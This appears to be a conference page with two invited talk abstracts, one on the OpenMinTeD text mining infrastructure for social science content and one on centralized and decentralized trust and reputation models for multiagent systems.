Peter Mutschke, GESIS – Leibniz Institute for the Social Sciences , Dep. Knowledge Technologies for the Social Sciences, Germany
Abstract: Text Mining (TM) is emerging as a powerful tool for uncovering knowledge in unstructured textual data, such as salient content items and entities, patterns they may follow as well as hidden relationships between different entities. TM therefore has a great potential to improve indexing and searching scholarly content. However, the high heterogeneity of current text mining tools makes applying them a challenging task for end users (researchers, curators, librarians, policy makers, etc). To overcome these high entry costs the EU-funded project OpenMinTeD aims at providing an open and sustainable TM infrastructure in order to make primary content accessible through standardized interfaces, to process, analyze and annotate text by well-documented text mining services and workflows that better facilitate identifying and extracting content items, patterns and relationships to be used for better structuring, indexing and searching content. The talk introduces to OpenMinTeD and discusses several application areas from the perspective of the social science domain.
Nick Bassiliades, Aristotle University of Thessaloniki, Department of Informatics, Greece
Abstract: Agents are supposed to act in open and thus risky environments with limited or no human intervention. Making the appropriate decision about who to trust in order to interact with is necessary but challenging. To this end, many trust and reputation models, based on interaction trust or witness reputation, have been proposed. These models are either centralized, where one or more centralized trust authorities keep agent interaction references (ratings) and give trust estimations, or decentralized, where each agent keeps its own interaction references with other agents and must estimate on its own the trust upon another agent. The centralized approaches are simpler to implement and they provide better and faster trust estimations; on the other hand, decentralized approaches although they need more complex interaction protocols, they are more robust since they do not have a single point of failure and they are more realistic, since in open environments central controlling authorities are hard to be enforced. In this talk, the above issues are going to be presented and analyzed along with the most important solutions given by the literature. Then, a number of research proposals towards centralized and distributed trust and reputation multiagent models made by the speaker and his research associates are going to be presented. These models are based both on numerical aggregations of selected agent interaction references and symbolical reasoning methods that use defeasible logic, a non-monotonic rule-based approach for efficient reasoning with incomplete and possibly inconsistent information.
Back to Top